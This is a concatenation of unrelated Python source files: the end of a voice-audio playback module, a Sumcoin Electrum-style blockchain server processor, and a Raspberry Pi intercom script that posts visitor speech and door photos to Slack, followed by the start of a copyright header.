streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, Hash, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.bitcoind_url = 'http://%s:%s@%s:%s/' % (
config.get('bitcoind', 'bitcoind_user'),
config.get('bitcoind', 'bitcoind_password'),
config.get('bitcoind', 'bitcoind_host'),
config.get('bitcoind', 'bitcoind_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("sumcoind is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 300000)\
or self.storage.height >= 1000000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.bitcoind_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_bitcoind(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def bitcoind(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach sumcoind...")
self.wait_on_bitcoind()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("sumcoind still warming up...")
self.wait_on_bitcoind()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
return rev_hex(Hash(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80) # does this 2016 represent a difficulty period?
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
self.headers_data = self.headers_data[:-40]
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
# store them on disk; store the current chunk in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.bitcoind('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
v = 0
with self.mempool_lock:
for txid, delta in self.mempool_hist.get(addr, ()):
v += delta
return v
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.bitcoind_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
# see if we can get if from cache. if not, add request to queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.bitcoind('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
except BaseException, e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Sumcoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.bitcoind('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.bitcoind('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
def get_block(self, block_hash):
block = self.bitcoind('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
logger.error("sumcoind error (getfullblock)")
self.wait_on_bitcoind()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run sumcoind with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_bitcoind()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
info = self.bitcoind('getinfo')
self.relayfee = info.get('relayfee')
self.bitcoind_height = info.get('blocks')
bitcoind_block_hash = self.bitcoind('getblockhash', (self.bitcoind_height,))
if self.storage.last_hash == bitcoind_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.bitcoind('getblockhash', (self.storage.height + 1,))
except BaseException, e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.bitcoind('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
self.mempool_unconfirmed[tx_hash] = set()
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
self.mempool_unconfirmed[tx_hash].add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
intercom-kun.py
|
#!/usr/bin/env python3
import cv2
import numpy as np
import mod.snowboydecoder as snowboydecoder
import sys
import os
import subprocess
import uuid
import logging
import threading
import requests
import json
import aiy.audio
import aiy.cloudspeech
import aiy.voicehat
import aiy.i18n
import mod.detect_intent_texts as detect_intent_texts
#Slack token and channel
TOKEN = '好きなトークンを入れてね'
CHANNEL = '好きなチャンネルを選んでね'
# set log
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
)
#set voice detect
#好きなホットワード的なインターホン音を引数にしてね
if len(sys.argv) == 1:
print("Error: need to specify model name")
print("Usage: python demo.py your.model")
sys.exit(-1)
model = sys.argv[1]
#lang code and uuid
aiy.i18n.set_language_code('ja-JP')
myuuid = str(uuid.uuid4())
def detect_motion(cap):
avg = None
while(cap.isOpened()):
ret, frame = cap.read()
frame = cv2.flip(frame, -1) #カメラ上下左右反転
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if avg is None:
avg = gray.copy().astype('float')
continue
#加重平均によるフレーム差分
cv2.accumulateWeighted(gray, avg, 0.5)
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(avg))
thresh = cv2.threshold(frameDelta, 3, 255, cv2.THRESH_BINARY)[1]
contours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[1]
max_area = 0
for cnt in contours:
area = cv2.contourArea(cnt)
if max_area < area and area < 10000 and area > 1000:
max_area = area
if max_area > 1000:
#print('hit motion')
break
else:
cap.release()
#sys.exit(1)
def text_to_slack(text):
#post to slack
param = {
'token':TOKEN,
'channel':CHANNEL,
'text':text,
'as_user':'true'
}
requests.post(url="https://slack.com/api/chat.postMessage",params=param)
def cap_to_slack(cap, text):
ret, frame = cap.read()
frame = cv2.flip(frame, -1) #カメラ上下左右反転
#画面の輝度補正。暗いとき用
#frame = (frame - np.mean(frame))/np.std(frame)*16+96
path = "photo.jpg"
cv2.imwrite(path,frame)
#post to slack
files = {'file': open("photo.jpg", 'rb')}
param = {
'token':TOKEN,
'channels':CHANNEL,
#'filename':"filename",
'initial_comment':text,
#'title': "title"
}
requests.post(url="https://slack.com/api/files.upload",params=param, files=files)
os.remove('photo.jpg')
def play_voice(voice_name):
voice_path = os.path.join(os.path.dirname(__file__), 'voice', voice_name) + '.wav'
print(voice_path, 'find...')
if os.path.exists(voice_path) == True:
print('voice', voice_path, 'found!')
print('voice play start!')
aiy.audio.play_wave(voice_path)
print('voice play end!')
def main():
recognizer = aiy.cloudspeech.get_recognizer()
detector = snowboydecoder.HotwordDetector(model, sensitivity=0.5)
button = aiy.voicehat.get_button()
led = aiy.voicehat.get_led()
player=aiy.audio.get_player()
text_recognizer = detect_intent_texts.get_recognizer()
aiy.audio.get_recorder().start()
text_to_slack(":robot_face: イン君 : こんにちは。私は自動応答機械、中国語の部屋の中の英国人。 \n インターホン君。略してイン君といいます。只今よりあなたの代わりに受付しますね。")
text_to_slack(":robot_face: イン君 : 私のソースコードはこちらです。 https://github.com/senyoltw/intercom-kun")
while(True):
cap = cv2.VideoCapture(0)
cap.set(3,640) # set Width
cap.set(4,480) # set Height
print('detect motion')
detect_motion_thread = threading.Thread(target=detect_motion, args=(cap,))
detect_motion_thread.start()
print('detect hotword')
detect_audio_thread = threading.Thread(target=detector.start)
detect_audio_thread.start()
detect_motion_thread.join()
detect_audio_thread.join()
print('hit! motion and hotword!')
text_to_slack(":robot_face: イン君 : あれ、誰か来たみたいです。")
print('cap 2 slack')
cap_to_skack_thread = threading.Thread(target=cap_to_slack, args=(cap, ":robot_face: イン君 : 玄関の写真です",))
cap_to_skack_thread.start()
to_the_end = False
while to_the_end == False:
print('Listening...')
text = recognizer.recognize()
#会話中のモーションを判定。ヒットしなければ消えたものとする
detect_motion_thread = threading.Thread(target=detect_motion, args=(cap,))
detect_motion_thread.start()
if not text:
print('Sorry, I did not hear you.')
else:
print('text 2 slack')
slack_text = ':dog2: 来客者 : ' + text
text_to_slack(slack_text)
print('You said "', text, '"')
answer = text_recognizer.recognize(myuuid, text)
print('Dialogflow Intents:"', answer.query_result.intent.display_name, '"')
print('Dialogflow result :"', answer.query_result.fulfillment_text, '"')
print('text 2 slack')
slack_text = ':robot_face: イン君 : ' + answer.query_result.fulfillment_text
text_to_slack(slack_text)
play_voice(answer.query_result.fulfillment_text)
to_the_end = answer.query_result.all_required_params_present
if to_the_end == False:
continue
detect_motion_thread.join(timeout=5)
if detect_motion_thread.is_alive() == False:
to_the_end = False
else:
to_the_end = True
print('The ENDってね')
text_to_slack(":robot_face: イン君 : いなくなりました。会話を終了します。")
cap.release()
if __name__ == '__main__':
main()
|
command.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
